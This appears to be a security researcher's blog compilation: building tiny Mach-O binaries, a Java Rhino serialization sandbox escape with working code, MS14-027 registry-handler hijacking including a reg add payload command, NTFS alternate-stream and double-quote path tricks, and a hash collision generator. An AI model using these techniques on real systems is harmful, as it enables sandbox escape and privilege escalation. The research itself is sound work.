Tyranid's Lair

The Quest for a Small Mach-O

For my sins I have recently actually enjoyed using OS X. There is just something about its unix'ness which appeals to me (though I would rather not have to pay for it to begin with). Anyway one of the first things I tend to do on an OS is to try and write as small an executable as possible and this is not the time to change that.

So this is maybe the first post of many on creating something small :) Note: I am working on Snow Leopard and producing 32bit code, YMMV.

Step 1: What can we do with basic tools?

So let's start with a normal development environment to see what we can get without having to write anything custom. Before we can do anything we need some code; here is a simple entry point with no reliance on external libraries, just straight into the exit syscall.
void start(void) {
    // Call exit(0)
    __asm__ volatile (
        "push $0\n"
        "movl $1, %eax\n"
        "int $0x80\n"
    );
}
It is worth pointing out that without this exit syscall your new application will just SIGBUS, not exactly optimal.

Now we just need to link it. We will choose to link statically, which should get rid of anything to do with the dynamic linker (that might have to change as we go along).
all: test1

test1: test1.c
	$(CC) -c -o test1.o test1.c
	$(LD) -o test1 -s -static -e _start test1.o

clean:
	rm -f test1 *.o
And our survey says? 4096 bytes, bugger. Well I guess page alignment is a killer. Of course using hexdump shows that over 3/4 of the file is empty. Still there is some hope for the future: running otool -lv over the output application shows that the entire 4k is being loaded into memory, a classic trick in making small binaries. Some nice-sounding options in the ld man page (such as -pagezero_size and -seg_page_size) just don't seem to work as expected, so no doubt something more custom is required next time.
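For reference, the commands I'm using to poke at the result are nothing special (a rough sketch; the otool flags are the ones mentioned above):

$ make
$ ls -l test1            # 4096 bytes
$ hexdump -C test1       # mostly zero padding
$ otool -lv test1        # dumps the load commands; note the whole 4k gets mapped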

Onwards and upwards.

The Quest : Part 2

So the last try at making a small Mach-O binary didn't really work. Now I could start fiddling with the linker to see if I can make things smaller, but I am not particularly up on my Apple linker usage, so instead let's jump straight to the binary assembler :)

Fortunately Apple chose to install nasm by default (well, when you install the developer tools), so we just need to understand how a Mach-O binary is laid out. There is some official documentation about the file format (and there are the referenced header files installed with the dev tools). Using the otool utility also gives a good idea of what is in a real binary (try running it with the -l option on the previous static binary to see what you get).

Anyway, as with last time I still want this executable to not require any dirty tricks, although looking at the file format there aren't many obvious ones we could employ (at least compared to some of the stunts you can play with ELFs).

So what needs to be in a valid Mach-O? The header, obviously, is required, then a number of load commands. It turns out (through a bit of reading the source) that you only actually need an LC_UNIXTHREAD (or LC_THREAD) command and the executable will load. It seems that, unlike most other executable formats, the entry point is not a field in the headers but is inferred by specifying the initial thread context.

Of course without any code in memory this isn't exactly that useful (well, not immediately) so we also need to specify an LC_SEGMENT load command. This will map some of our binary into memory and we are ready to go. As a short aside, if you look at the output of otool -l, under most segments there are also sections; these are, as far as I can tell, unnecessary, and are more metadata to make linking more consistent.
; A basic Mach-O executable
; (c) Tyranid 2010
BITS 32

ORG 0x1000

_program_start:

; mach_header
dd 0xfeedface ; MH_MAGIC
dd 7 ; cputype
dd 3 ; cpusubtype
dd 2 ; filetype
dd 2 ; ncmds
dd _cmd_end-_cmd_start ; sizeofcmds
dd 0x2001 ; flags

_cmd_start:

_segment_cmd:
dd 1 ; LC_SEGMENT
dd _segment_cmd_end-_segment_cmd ; sizeofcmd
_segment_name: ; segname
db "__TEXT"
times 16-$+_segment_name db 0
dd _program_start ; vmaddr
dd ((_program_end-_program_start)+4095)&~4095 ; vmsize
dd 0 ; fileofs
dd _program_end-_program_start ; filesize
dd 7 ; maxprot
dd 5 ; initprot
dd 0 ; nsects
dd 4 ; flags

_segment_cmd_end:

_thread_cmd_start:
dd 5 ; LC_UNIXTHREAD
dd _thread_cmd_end-_thread_cmd_start ; sizeofcmd
dd 1 ; flavor (i386_THREAD_STATE)
dd (_registers_end-_registers_start)/4 ; count

_registers_start:
dd 0 ; unsigned int __eax;
dd 0 ; unsigned int __ebx;
dd 0 ; unsigned int __ecx;
dd 0 ; unsigned int __edx;
dd 0 ; unsigned int __edi;
dd 0 ; unsigned int __esi;
dd 0 ; unsigned int __ebp;
dd 0 ; unsigned int __esp;
dd 0x1F ; unsigned int __ss;
dd 0 ; unsigned int __eflags;
dd _start ; unsigned int __eip;
dd 0x17 ; unsigned int __cs;
dd 0x1F ; unsigned int __ds;
dd 0x1F ; unsigned int __es;
dd 0 ; unsigned int __fs;
dd 0 ; unsigned int __gs;
_registers_end:

_thread_cmd_end:

_cmd_end:

_start:
; Call exit(42)
push byte 42
push byte 1
pop eax
push eax
int 0x80

_program_end:

Throw it through nasm in binary mode and what do we get? 172 bytes, far smaller. There are some further tricks you could play, such as embedding the code inside the thread context (as only EIP and probably the segment registers are important) or actually storing a few of the necessary values in the context to slightly reduce the pushes. Still, 172 is alright for now; can it go any lower?
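As a hedged, untested sketch of that first trick: the thread context is just attacker-controlled bytes, so the 8 bytes of exit code could live in the slots for the general-purpose registers, with EIP pointed back into the register block (the loader will happily set EAX and EBX to our opcode bytes):

_registers_start:
_exit_code:
    push byte 42            ; code stored in the __eax/__ebx slots
    push byte 1
    pop eax
    push eax
    int 0x80
    times 8-($-_exit_code) db 0 ; pad the code to exactly two dwords
    dd 0, 0, 0, 0, 0, 0     ; __ecx to __esp
    dd 0x1F                 ; __ss
    dd 0                    ; __eflags
    dd _exit_code           ; __eip points back into the register block
    dd 0x17                 ; __cs
    dd 0x1F                 ; __ds
    dd 0x1F                 ; __es
    dd 0                    ; __fs
    dd 0                    ; __gs
_registers_end:

That would save the 8 bytes the separate _start block currently occupies.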

Fun with Java Serialization and Reflection

Last year I started to have a poke at Java for security vulnerabilities. I am not really sure why, but probably because I was having some success breaking .NET and felt Java was likely to have similar issues. Shame I picked a bad time to do so if I wanted to be famed for owning Java (re: Security Explorations). Still I think I found a few things Adam Gowdiak didn't find :)

Anyway, with the recent fixing of my last Java vulnerability in 7 update 13 (CVE-2012-3213 if you care) I felt it was a good time to describe what it did and how it worked, especially as it is a mixture of the classic Java serialization vulnerabilities and the hot topic of reflection, making it an interesting vulnerability. It will also describe another source of access to protected package Class objects.

The underlying issue is in the Rhino script engine. This is a Javascript interpreter built into modern versions of the JRE (from version 6 onwards) and originally comes from a Mozilla project where it was primarily designed to run in a fully trusted environment. It has had security issues before (for example see CVE-2011-3544) as Sun/Oracle decided to make it work in a sandboxed Java environment. However to exploit what I found you have to be a bit creative.

A Quick Overview of Rhino Security

As the script engine could potentially run user-defined code in a trusted environment, one of the things added to the engine was a set of checks to prevent sandboxed code from calling into objects which might have dangerous side effects, for example gaining access to protected packages such as 'sun.*'. In order to access a native Java object the engine must first wrap it with a scriptable wrapper by using a WrapFactory. The JRE provides a custom implementation in com.sun.script.javascript.RhinoWrapFactory which does these checks before the Javascript is allowed to call methods on that object. That code checks things like whether the object is a ClassLoader (which might allow the script to bypass package access checks in loadClass etc.); it also checks the package name of Class objects and classes to see if they are visible to scripts (ultimately calling the current security manager's checkPackageAccess method). There are some exclusions though, because the core Rhino classes are actually embedded within the sun.* package, which means scripts can at least get access to those. At any rate, what this ultimately meant was that I couldn't see an immediate way of using the script engine to call into protected classes to do something nasty.

Bug Hunting in the Javascript World

The fact that these wrapping mechanisms are needed is a good example of some of the differences between Java and Javascript. You could consider Javascript to have one of the most flexible reflection implementations; all objects are reflectable (well, of course, depending on the implementation). For example, to determine what properties and functions an object supports you can do something as simple as:

for(x in obj)
{
    println(x + ": " + typeof(obj[x]));
}
You can dispatch methods or read properties just by using the obj[x] syntax. The Rhino script engine aims to replicate this functionality even for native Java objects by providing isolated scriptable wrappers around common reflection primitives such as methods, fields and constructors. You can find these under the sun.org.mozilla.javascript.internal package with classes such as NativeJavaConstructor and NativeJavaMethod. The interesting thing I noticed was that these were not performing any further reflection checks on the classes they were interacting with; presumably, if you could get access to one of these classes you must have already gone through the object wrapping process, which would have blocked the package access. And so it proved: after a bit of digging I managed to find the syntax for getting access to the constructor object using the following code:

importClass(Packages.sun.swing.SwingLazyValue); 

SwingLazyValue['(java.lang.String,java.lang.String,java.lang.Object[])'];

This would get you a constructor object for the SwingLazyValue class (which is a useful execution pivot in the JRE to call internal static functions, especially as it is based on a public interface we can access and call through). But if you try this in a sandboxed environment it fails with an exception due to the package access check on the Class object; so close and yet so far. Still, there is clearly a way of exploiting it, otherwise I wouldn't be documenting it.
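To illustrate why that constructor makes such a good pivot, here's a minimal sketch of what SwingLazyValue does for you, written as ordinary trusted Java (the target method and arguments are just harmless examples):

import sun.swing.SwingLazyValue;

public class PivotDemo {
    public static void main(String[] args) {
        // createValue() reflectively invokes the named static method
        // from inside a trusted system class.
        SwingLazyValue lazy = new SwingLazyValue(
            "java.lang.System", "getProperty",
            new Object[] { "java.version" });
        System.out.println(lazy.createValue(null));
    }
}

Swap the class and method names for something like sun.awt.SunToolkit.getField and you can see where this is heading.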

Serialization to the Rescue

If you look at the class hierarchy of the NativeJavaConstructor class you will notice something interesting (or at least you would have done prior to update 13): it implemented the Serializable interface. So perhaps instead of using Javascript to access the constructor we could instead use serialization. The advantage of this approach is that we might be able to reconstruct the object in native Java code first (which won't necessarily complain about it) and then pass it back into Javascript for the final exploitation.

I knocked up a simple full-trust application which would capture a NativeJavaConstructor object, serialize it, then check it deserialized correctly. I went to run it, but it threw an exception because some internal fields could not be serialized. Damn... Looking through the documentation, it seems serialization was a vestigial feature of the original Mozilla implementation; Sun had not bothered to ensure it still worked correctly. So I followed a hunch: perhaps the object doesn't actually need those unserializable fields, perhaps I can just remove them. Fortunately Java makes it relatively easy to do this by overriding the replaceObject method on the java.io.ObjectOutputStream class.

A few minutes later I had:

class MyObjectOutputStream extends ObjectOutputStream {
    public MyObjectOutputStream(OutputStream stm) throws Throwable {
        super(stm);
        enableReplaceObject(true);
    }

    protected Object replaceObject(Object o) {
        String name = o.getClass().getName();
        if(name.startsWith("com.sun.script.javascript.")) {
            return null;
        }
        return o;
    }
}

Running this in my full-trust application my hunch was proven correct: the script didn't in fact need those internal fields to work, and the NativeJavaConstructor object could be used freely when deserialized. Feeling the end was in sight I plugged it into an Applet, took the binary output from the full-trust application and deserialized it, and was disappointed to be greeted with:

java.security.AccessControlException: access denied 
("java.lang.RuntimePermission"
"accessClassInPackage.sun.org.mozilla.javascript.internal")
at java.security.AccessControlContext.checkPermission(AccessControlContext.java)
at java.security.AccessController.checkPermission(AccessController.java)
at java.lang.SecurityManager.checkPermission(SecurityManager.java)
at java.lang.SecurityManager.checkPackageAccess(SecurityManager.java)
at sun.applet.AppletSecurity.checkPackageAccess(AppletSecurity.java)
at sun.applet.AppletClassLoader.loadClass(AppletClassLoader.java)
at java.lang.ClassLoader.loadClass(ClassLoader.java)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java)
at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java)
at Demo.doExploit(Demo.java)

So I seemed to have gained nothing; I had traded a package access check on one class for one on the Rhino implementation classes. Still, all was not lost, I had a plan.

Ask and You Shall Receive

Now if you look at the stack trace of the exception, one method frame is clearly responsible for it: the java.io.ObjectInputStream.resolveClass method. If you go and look at the implementation of that, it is passing the current class loader into the forName method, which in an Applet is the AppletClassLoader, which doesn't much care for handing out references to sun.* package classes. Still, serialization in Java (compared to .NET, with which I have a bit of experience) is an unprivileged operation; even sandboxed code can do it, and there are also some things you can do to modify the process of serialization to do some funky things, like overriding the resolveClass implementation. So this led me to the realization that perhaps if I could get the protected Class objects from somewhere else then I could implement my own ObjectInputStream, override the resolveClass method and return what I needed. So I put together:

class MyObjectInputStream extends ObjectInputStream {
    Hashtable dict;

    public MyObjectInputStream(InputStream stm, Hashtable dict)
            throws IOException {
        super(stm);
        this.dict = dict;
    }

    protected Class resolveClass(ObjectStreamClass clazz)
            throws IOException, ClassNotFoundException {
        if(dict.containsKey(clazz.getName())) {
            return (Class)dict.get(clazz.getName());
        } else {
            return super.resolveClass(clazz);
        }
    }
}

This class takes a Hashtable containing some classes; if we already have the required Class object we can return it as-is so we don't get the security exception. But of course this begs the question: how will we populate the dictionary? Well, the key is in serialization itself.

We already know that the NativeJavaConstructor class is serializable; we also know untrusted code can perform the serialization process, and that untrusted code can create NativeJavaConstructor objects as long as they point to non-privileged classes. So can we not use the serialization process against itself to get access to all the classes we need?

It turns out we cannot directly use ObjectOutputStream with the overridden replaceObject method, as that is actually one of the few privileged operations in the serialization process (something to do with access to private fields). Instead we will go to the source of how ObjectOutputStream determines what to serialize: the ObjectStreamClass class. You can call this from untrusted code and it will return you a description of the object, including the classes of the object's fields. From this you can take copies of the classes and keep them for the input stream to use. Such as:

public void captureTypes(Object o) {
    try {
        Class c = o.getClass();

        while(c != Object.class) {
            // dict.putClass is a helper which stores the class keyed by name.
            dict.putClass(c);

            ObjectStreamClass stmClass = ObjectStreamClass.lookup(c);
            ObjectStreamField[] fs = stmClass.getFields();

            for(int i = 0; i < fs.length; ++i) {
                Class fc = fs[i].getType();
                dict.putClass(fc);
            }

            c = c.getSuperclass();
        }
    } catch(Throwable e) {}
}

This fills in the dictionary and you are good to go. And amazingly this does work... From that I could do things like create my SwingLazyValue which would call a static method such as SunToolkit.getField and that was the end of the road for the sandbox. Of course how you actually go about getting the sun.swing.SwingLazyValue Class object is left as an exercise for the reader ;)

Conclusion

Well, it looks like the fix in 7u13 was simple: anything within Rhino which could be serialized now cannot be, which, considering serialization never worked without substantial effort anyway, I guess isn't an issue from a compatibility point of view. But it does once again show that package access restrictions, especially where serialization is involved, are not adequate to protect Java from itself.

Impersonation and MS14-027

The recent MS14-027 patch intrigued me: a local EoP using ShellExecute. It seems it also intrigued others, so I pointed out on Twitter how it probably worked, but I hadn't confirmed it. This post is just a quick write-up of what the patch does and doesn't fix. It turned out to be more complex than it first seemed and I'm not even sure it's correctly patched. First a few caveats: I am fairly confident that what I'm presenting here is already known to some. Also I'm not providing direct exploitation details; you'd need to find the actual mechanism to get the EoP working (at least to LocalSystem).

I theorized that the issue was due to mishandling of the registry when querying for file associations, specifically the handling of the HKEY_CLASSES_ROOT (HKCR) registry hive when under an impersonation token. When the ShellExecute function is passed a file to execute it first looks up the extension under the HKCR key. For example, if you try to open a text file it will try to open HKCR\.txt. If you know anything about the registry and how COM registration works you might know that HKCR isn't a real registry hive at all. Instead it's a merging of the keys HKEY_CURRENT_USER\Software\Classes and HKEY_LOCAL_MACHINE\Software\Classes. In most scenarios HKCU is taken to override HKLM registration, as we can see in the following screenshot from Process Monitor (note Process Monitor records all access to HKLM classes as HKCR, confusing the issue somewhat).





When ShellExecute has read this registry key it tries to read a few values out of it, most importantly the default value. The default value contains a ProgID, which determines how the shell handles the file extension. So for example the .txt extension is mapped to the ProgID 'txtfile'.

The ProgID just points ShellExecute at HKCR\txtfile, and there we finally find what we're looking for: the shell verb registrations. The ShellExecute function also takes a verb parameter; this is the action to perform on the file, so it could be print or edit, but by far the most common one is open. There are many possible things to do here but one common action is to run another process, passing the file path as an argument. As you can see below, a text file defaults to being passed to NOTEPAD.

Now the crucial thing to understand here is that HKCU can be written to by a normal, unprivileged user. But HKCU is again a fake hive and is in fact just the key HKEY_USERS\SID, where SID is replaced with the string SID of the current user (see, pretty obvious I guess). And even this isn't strictly 100% true when it comes to HKCR, but it's close enough. Anyway, so what, you might be asking? Well, this is all wonderful until user impersonation gets involved. If a system or administrator process impersonates another user, it also suddenly finds that when it accesses HKCU it really accesses the impersonated user's keys instead of its own. Perhaps this could lead to a system service that is impersonating a user calling ShellExecute and starting up the wrong handler for a file type, leading to arbitrary execution at a higher privilege.
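You can demonstrate the HKCU switcheroo directly. Here's a minimal sketch (error handling elided, and acquiring the token is up to you): RegOpenCurrentUser resolves HKEY_USERS\<SID> for whichever user the calling thread is currently impersonating.

#include <windows.h>

void DumpImpersonatedClasses(HANDLE hToken) {
    if (ImpersonateLoggedOnUser(hToken)) {
        HKEY hKey;
        // Opens the impersonated user's HKCU, not the process owner's.
        if (RegOpenCurrentUser(KEY_READ, &hKey) == ERROR_SUCCESS) {
            // ... query Software\Classes\.txt and friends here ...
            RegCloseKey(hKey);
        }
        RevertToSelf();
    }
}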

With all this in mind let's take a look at the patch in a bit more depth. The first step is to diff the patched binary against the original, sometimes easier said than done. I ran unpatched and patched copies of shell32.dll through Patchdiff2 in IDA Pro, which led to a few interesting changes. In the function CAssocProgidElement::_InitFileAssociation a call was added to a new function, CAssocProgidElement::SetPerMachineRootIfNeeded.


Digging into that revealed what the function was doing. If the current thread is impersonating another user, the current Session ID is 0 and the file extension being looked up is one of a set of specific types, the lookup is switched from HKCR to HKLM only. This seemed to confirm my suspicions that the patch targeted local system elevation (the only users in session 0 are likely to be LocalSystem or one of the service accounts) and that it was related to impersonation.




Looking at the list of extensions they all seemed to be executables (so .exe, .cmd etc.), so I knocked up a quick example program to test this out.


Running this program from a system account (using good old psexec -s), passing it the path to an executable file and the process ID of one of my user processes (say explorer.exe), I could see in Process Monitor that it was reading the corresponding HKCU registry settings.








Okay, so a last bit of exploitation is necessary I guess :) If you now register your own handler for the executable ProgID (in this case cmdfile), then no matter what the process executes it will instead run code of the attacker's choosing at whatever privilege the caller has. This is because impersonation doesn't automatically cross to new processes; you need to call something special like CreateProcessAsUser to do that.
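For illustration, hijacking the open verb on cmdfile for the current user is just one registry write away (the payload path here is obviously hypothetical):

reg add "HKCU\Software\Classes\cmdfile\shell\open\command" /ve /d "c:\attacker\payload.exe \"%1\"" /f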


So how's it being exploited in the real world? I can't say for certain without knowing the original attack vector (and I don't really have the time to go wading through all the system services looking for the bad guy, assuming it's even Microsoft's code and not a third-party service). Presumably there's something which calls ShellExecute on an executable file type (where you don't control the path) while impersonating another user.

Still, is it fixed? One thing I'm fairly clear on is there still seem to be a few potential attack vectors. This doesn't seem to do anything against an elevated admin user's processes being subverted: if you register a file extension as the unprivileged user it will get used by an admin process for the same user. This is ultimately by design, otherwise you would get inconsistent behaviour in elevated processes. The fix is only enabled if the current thread is impersonating and it's in session 0 (i.e. system services), and it's only enabled for certain executable file types.

This last requirement might seem odd; surely this applies to any file type? Well it does in a sense, however the way ShellExecute works is that if the handling of the file type might block, it runs the processing asynchronously in a new thread. Just like processes, threads don't inherit impersonation tokens, so the issue goes away. It turns out about the only thing it treats synchronously is executables. Well, unless anyone instead uses things like FindExecutable or AssocQueryString, but I digress ;-) And in my investigation I found some other stuff which perhaps I should send MS's way; let's hope I'm not too lazy to do so.


Abusive Directory Syndrome

As ever there's been some activity recently on Full Disclosure where one side believes something's a security vulnerability and the other says it's not. I'm not going to be drawn into that debate, but one interesting point did come up: specifically, that you can't create files in the root of the system drive (i.e. C:\) as a non-admin user, you can only create directories. Well, this is both 100% true and false at the same time; it just depends what you mean by a "file" and who is asking at the time.

The title might give the game away: this is all to do with NTFS Alternate Data Streams (ADS). The NTFS file system supports multiple alternate data streams which can be assigned to a file; these can be used for storing additional attributes and data out-of-band. For example, Internet Explorer uses one to store the zone information for a downloaded file so the shell can warn you when you try to execute a file from the Internet. Streams have names and are accessed using a special syntax: filename:streamname. You can easily create a data stream using the command prompt; type the following (in a directory you can write to):

echo Hello > abc
echo World! > abc:stm

more < abc - Prints Hello
more < abc:stm - Prints World!


Easy, no? Okay, let's try it in the root of the system drive (obviously as a normal user):

echo Hello > c:\abc:stm - Prints Foxtrot Oscar
Oh well, worth a try, but wait, there's more... One of the lesser-known abilities of ADS, except to the odd malware author, is that you can also create streams on directories. Does this create new directories? Of course not, it creates file streams which you can access using the file APIs. Let's try this again:

mkdir c:\abc
echo Fucking Awesome! > c:\abc:stm
more < c:\abc - File can't be found
more < c:\abc:stm - Prints Fucking Awesome!

Well we've created something which looks like a file to the Windows APIs, but is in the root of the system drive, something you're not supposed to be able to do. It seems deeply odd that you can:

  • Add an ADS to a directory, and 
  • The ADS is considered a file from the API perspective

Of course this doesn't help us exploit unquoted service paths, you can't have everything. Still when you consider the filename from a security perspective it has an interesting property, namely that its nominal parent in the hierarchy (when we're dealing with paths that's going to be what's separated by slashes) is C:\. A naive security verification process might assume that the file exists in a secure directory, leading to a security issue.
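To make that concrete, here's a minimal sketch of the naive check being fooled, assuming the verifier derives the parent directory by stripping the last path component (e.g. with PathRemoveFileSpec):

#include <windows.h>
#include <shlwapi.h>
#include <stdio.h>
#pragma comment(lib, "shlwapi.lib")

int main() {
    // An ADS on the user-created directory c:\abc.
    WCHAR path[MAX_PATH] = L"c:\\abc:stm";
    PathRemoveFileSpecW(path);
    // Prints "c:\" - the nominal parent is the drive root, even though
    // the data really lives on a directory the user controls.
    wprintf(L"%s\n", path);
    return 0;
}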

Take for example User Account Control (UAC), better known as the "Stop with the bloody security dialogs and let me get my work done" feature which was introduced in Vista. The service which controls this (Application Info) has the ability to automatically elevate certain executables, either for controlling the UI (UIAccess) or to reduce the number of prompts you see. It verifies that the executables are in a secure directory such as c:\windows\system32 but specifically excludes writeable directories such as c:\windows\system32\tasks. But if you could write to Tasks:stm then that wouldn't be under the Tasks directory and so would be allowed? Well, let's try it!

echo Hello > c:\windows\system32\tasks:stm
more < c:\windows\system32\tasks:stm - Access Denied :(

Why does it do that? We only have to take a look at the DACL to find out why: we have write access to Tasks but not read:

c:\>icacls c:\Windows\system32\tasks
c:\Windows\system32\tasks BUILTIN\Administrators:(CI)(F)
BUILTIN\Administrators:(OI)(R,W,D,WDAC,WO)
NT AUTHORITY\SYSTEM:(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(R,W,D,WDAC,WO)
NT AUTHORITY\Authenticated Users:(CI)(W,Rc)
NT AUTHORITY\NETWORK SERVICE:(CI)(W,Rc)
NT AUTHORITY\LOCAL SERVICE:(CI)(W,Rc)
CREATOR OWNER:(OI)(CI)(IO)(F)

Oh well... such is life. We've managed to create the stream but can't re-read it; awesome, Write-Only Memory. Still, this does demonstrate something interesting: the DACL for the directory is applied to all its streams, even though the DACL might make little sense for file content. The directory DACL for Tasks doesn't allow normal users to read or list the directory, which means that you can't read or execute the file stream.

In conclusion, all you need to be able to create an ADS on a directory is write access to the directory. This is normally so you can modify the contents of the directory, but it also applies to creating streams. The security descriptor that then governs a stream is the parent directory's, which might not be as expected. If I find the time I might blog about other interesting abuses of ADS at a later date.

Addictive Double-Quoting Sickness

Much as I'd love it if people who used "Scare Quotes" (see what I did there) were punished appropriately, I doubt my intolerance is shared sufficiently amongst the general population. So this blog post's not about that, but something security-related which keeps on popping up when it really shouldn't.

Still if I could be as loved as Mike Myers it might be worth using them myself. Wait...
This is a post about abusing ADS, but what I'm going to talk about is something I refer to as Domain-Specific Weirdness, at least when I'm bored and decide to make stuff up. The term refers to those bugs which are due to not understanding the differences between domain-specific representations. A far too common coding pattern you'll see on Windows in "secure" systems (I really need help) is something like the following:
path = GetExecutablePath();

if(ValidAuthenticode(path)) {
    cmdline = '"' + path + '"';

    CreateProcess(NULL, cmdline, ...);
}

The security issue appears when the executable path is influenced by untrusted code. The ValidAuthenticode function verifies the file is signed by a specific certificate; only if that passes will the executable be started. This hits so many bug classes as it is: poor input validation, TOCTOU between the validation and process creation, and failing to pass the first argument to CreateProcess. But the sad thing is you see it in real software by real companies, even Microsoft.

Now to be fair, the one thing the code does right is it ensures the path is double-quoted before passing it to CreateProcess. At least you won't get some hack hassling you for executing C:\Program.exe again. But process command lines and file paths are two completely different interpretation domains. CreateProcess pretty much follows how the standard C Runtime parses the process path. The CRT is open source, so we can take a look at how the executable name is parsed out. In there you'll find the following comment (the file's stdargv.c if you're curious):
/* A quoted program name is handled here. The handling is much
simpler than for other arguments. Basically, whatever lies
between the leading double-quote and next one, or a terminal null
character is simply accepted. Fancier handling is not required
because the program name must be a legal NTFS/HPFS file name.
Note that the double-quote characters are not copied, nor do they
contribute to numchars. */
You've got to love how much MS still cares about OS/2. Except this is of course rubbish: the program name doesn't have to be a legal NTFS/HPFS file name in any way, especially for CreateProcess. The rationale for ignoring illegal program names is that NTFS, like many file systems, has a specific set of valid characters.

What's a valid NTFS file name, you might ask? You can go look it up in MSDN; instead I put together a quick test case to find out.
#include <stdio.h>
#include <Windows.h>
#include <string>

int wmain(int argc, WCHAR* argv[])
{
    for (int i = 1; i < 65536; ++i)
    {
        // Note the escaped backslash; L".\a" would embed a bell character.
        std::wstring name = L".\\a";
        name += (WCHAR)i;
        name += L"a";

        HANDLE hFile = CreateFile(name.c_str(),
            GENERIC_READ | GENERIC_WRITE, FILE_SHARE_DELETE, NULL,
            CREATE_ALWAYS, FILE_FLAG_DELETE_ON_CLOSE, NULL);

        if (hFile == INVALID_HANDLE_VALUE)
        {
            printf("Illegal Char: %d\n", i);
        }
        else
        {
            CloseHandle(hFile);
        }
    }

    return 0;
}
And it pretty much confirms MSDN: you can't use characters 1 through 31 (0 is implied), 32 (space) has some oddities, and you can't use any of <, >, :, ", /, \, |, ?, *. Notice the double-quote sitting there proud, in the middle.

Okay, let's get back to the point: what's this got to do with ADS? If you read this you'll find the following statement: "Any characters that are legal for a file name are also legal for the stream name, including spaces". If you read that and thought it meant that stream names have the same restrictions as file names in NTFS, I have a surprise for you. Change the test case so that instead of '.\a' we use '.\a:' and we find that the only banned characters are \, / and :, quite a surprise. For our "bad" code we can now complete the circle of exploitation. You can pass a file name such as c:\abc\xyz:file" and the verification code will verify c:\abc\xyz:file" but actually execute c:\abc\xyz:file (subtle, I know). And the crazy thing about this is there isn't even a way to escape it.
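A quick test of that claim (assuming a writeable c:\abc directory already exists):

#include <windows.h>
#include <stdio.h>

int main() {
    // The stream name contains a literal double-quote character.
    HANDLE hFile = CreateFileW(L"c:\\abc\\xyz:file\"",
        GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("Failed: %lu\n", GetLastError());
    } else {
        printf("Created a stream with a double-quote in its name\n");
        CloseHandle(hFile);
    }
    return 0;
}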

The moral of the story is this: you can never blindly assume that even a single interpretation domain works how you expect it to, so when you mix domains together pain will likely ensue. This is also why Windows command line processing is so broken. At least *nix passes command line arguments separately, well, unless you use something like system(3) (and for that you'll be punished). Making assumptions on the "validity" of a file path just seems inherently untrustworthy.

Hash Collisions of the Non-Cryptographic Kind

Recently I had a bug which required me to create a hash collision between two strings. Fortunately it wasn't a cryptographically secure hashing algorithm, it was only used in a hash table. The algorithm itself was pretty simple, as shown below:
int hash(const char* c, size_t len) {
    int h = 0;

    while (len > 0) {
        h = h * 31 + *c++;
        len--;
    }

    return h;
}

I had one string, say "abc" which I needed to have the same hash as "xyz". As this code was written in C all string comparisons were performed using the standard C string functions. Therefore from a comparison point of view the strings "abc", "abc\0efgh" etc. are equivalent as the comparison function would terminate at the NUL. However because the hashing algorithm takes the entire string including any NUL characters their hash values are not equal. This makes it possible to create a string with the following properties:

char* s = "abc\0" SUFFIX; // adjacent string literals concatenate
strcmp(s, "abc") == 0

and

H(s) != H("abc")
H(s) == H("xyz")

To generate the collision you might be tempted to try brute force, well good luck with that. Being one for pointless pop culture references I recalled the Exorcist, and realized "The Power of Maths Compels You...", isn't that what the film's about?

On second thoughts perhaps it's about something else entirely?
Clearly maths holds the key to calculating the hash collision. I had free rein over the characters I could choose to generate the collision, which makes it simpler. The key is realising what the hashing algorithm actually does. If you expand out the original code you get something like the following, where S is the string and N is the length of the string.

h = S[0]*31^(N-1) + S[1]*31^(N-2) + ... + S[N-1]

Does that look familiar? No? Well, what if I changed the value 31 to 2, giving:

h = (S[0] << (N-1)) + (S[1] << (N-2)) + ... + (S[N-1] << 0)

Look more familiar? It turns out all the hashing algorithm is doing is generating a number in base 31. Therefore finding a hash collision mathematically is going to be pretty simple. All we need to do is calculate the hash of the string with a dummy suffix, calculate the difference between that hash and the destination hash, and finally generate a replacement suffix with that difference encoded in base 31. So for completeness here's my code in C++.

#include <stdio.h>
#include <string.h>
#include <string>
#include <iostream>
using namespace std;

int H(int h, const string& s) {
    for (char c : s) {
        h = h * 31 + c;
    }
    return h;
}

string collide(const string& target_str, const string& base_str) {
    // Initialize suffix with all zeros; the leading NUL keeps strcmp happy
    string suffix(8, 0);

    int target_hash = H(0, target_str);
    int base_hash = H(H(0, base_str), suffix);

    unsigned int diff = target_hash - base_hash;

    // Encode the difference in base 31 across the suffix characters
    for(int i = 7; i > 1; --i) {
        suffix[i] = diff % 31;
        diff /= 31;
    }

    suffix[1] = diff;

    return base_str + suffix;
}

int main() {
    string a = "xyz";
    string b = "abc";
    string c = collide(a, b);

    cout << H(0, a) << " " << H(0, b) << " " << H(0, c) << endl;
    cout << b.compare(c) << " " << strcmp(b.c_str(), c.c_str()) << endl;

    return 0;
}
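For what it's worth, H(0, "xyz") is 119193 and H(0, "abc") is 96354 (this is the same algorithm as Java's String.hashCode, so those numbers are easy to check), so assuming I've done the arithmetic right the first line should print 119193 96354 119193, and the second a non-zero value followed by 0.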

Sometimes it pays just to sit down and think through seemingly tricky problems as they tend to be simpler than you imagine.

A Tale of Two .NET Methods

Sometimes the simplest things amuse me. Take for example CVE-2014-0257, which was a bug in the way DCOM was implemented in .NET which enabled an Internet Explorer sandbox escape. Via the DCOM interface you could call the System.Object.GetType method, then command the reflection APIs to do anything you like, such as popping the calculator. The COM interface, _Object, which exposed the GetType method only has 4 functions on it; it seemed pretty unlucky that 25% of the interface had a security vulnerability. Still, Microsoft fixed this bug and all's well with the world. Then again, if you were lucky enough to see any of my IE11 sandbox presentations you might have seen the following slide, although briefly:

